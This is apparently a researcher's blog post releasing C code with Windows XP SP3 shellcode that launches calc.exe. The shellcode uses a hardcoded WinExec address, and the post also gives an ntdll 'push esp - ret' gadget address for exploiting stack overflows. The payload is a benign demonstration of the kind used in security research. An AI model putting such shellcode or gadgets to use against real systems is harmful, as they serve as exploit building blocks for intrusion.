Shellcode for Windows XP SP3 Professional SPA (DLLs version 5.1.2600.5512) / calc.exe

As a side product of my presentation in conference NoConName 2012 this last Saturday, I release here the code for a shellcode that opens the ‘calc.exe’ process. It has been tested on a Windows XP SP3 Professional Edition (SPA), kernel32.dll version 5.1.2600.5512 and ntdll.dll version 5.1.2600.5512.

int main(int argc, char* argv)
{
char jmpNtdll[] = "\xB0\x9D\x92\x7C"; // push esp - ret (ntdll.dll)
char shellcode[] =
"\x31\xC9" // xor ecx, ecx
"\x51" // push ecx
"\x68\x2E\x65\x78\x65" // push 6578652E
"\x68\x63\x61\x6C\x63" // push 636C6163
"\x8B\xCC" // mov ecx, esp
"\x6A\x05" // push SW_SHOW
"\x51" // push ecx
"\xBF\xAD\x23\x86\x7C" // mov edi, kernel32.WinExec
"\xFF\xD7" // call edi
"\xEB\xFE" // jmp $EIP
;


printf("%s%s\n", jmpNtdll, shellcode);
return 0;
}